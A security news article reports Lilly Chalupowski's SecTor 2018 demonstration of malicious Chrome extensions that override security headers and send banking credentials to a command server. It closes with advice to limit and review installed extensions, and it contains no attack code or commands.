You may trust your browser, but do you trust what it’s running? At SecTor 2018, threat intelligence specialist Lilly Chalupowski demonstrated why you shouldn’t.
Browser extensions are the small applications that your browser installs to provide extra features. These can do anything from translating web sites to letting you download videos from streaming sites. These extensions can be a huge problem.
When your best friend brings a new friend of theirs to your party, you assume that this new person will be well behaved. Most of the time, you’ll be right, because you trust your friend’s character judgements.
Trust no one
Browsers and extensions are the same. Your operating system already trusts the browser, which also means that it trusts whatever extra software the browser brings to the party, just as you do when you open the door to your best friend and his +1.
Occasionally, though, things go wrong. You’ll find that new party guest cooking crystal meth in your bathroom having broken open and pocketed your framed collection of memorial coins. Awkward.
As a security application developer in threat intelligence at GoSecure, Chalupowski spends her days thinking her way inside attackers’ heads. Her experience as a penetration tester has made her adept at identifying and documenting new attack vectors.
Google tries to protect you from malicious extensions in its Chrome browser. It includes features such as a content security policy, sandboxing, and Cross-Origin Resource Sharing, which lets developers limit requests between one web domain and another. It offers multiple security headers to help govern what information Chrome extensions can send.
Overriding security headers
Chaluposki blew right through those measures in her talk at SecTor 2018 using little more than a simple script.
“I can nuke what’s there and take it all out,” she says. “I thought there would have been something to prevent that but there’s not.”
She then managed to communicate between the malicious extension and the command and control server, sending plain text login information from a banking site. She was also able to send malicious code from the C&C server back to the browser, triggering an alert box in her demo.
We sat down with Chalupowski to talk more about what she found:
Google does its best to check for malicious extensions in the Chrome web store, using machine learning. Nevertheless, they still slip through and compromise thousands of users by effectively turning the Chrome Web Store into a massive watering hole.
That same month, researchers found a malicious add-on called Tiempo en colombia en vivo, which, just like our unwanted party guest, refused to leave. It proved almost impossible to get rid of after blocking users from accessing the list of installed extensions using a simple redirect.
Often, crooks will use social engineering techniques like phishing to get these extensions onto unwitting users’ systems. One such scam, posing as an anti-cryptojacking extension, was found stealing victims’ private cryptocurrency keys in March 2019.
How to protect yourself
These steps alone isn’t enough, though; The fact that no one has found malicious activity in an extension doesn’t mean that it doesn’t exist. For extra protection, consider limiting the number of extensions you install and regularly reviewing those already installed on your system to see if you still use them. Reducing your attack surface is an important step for any browser user.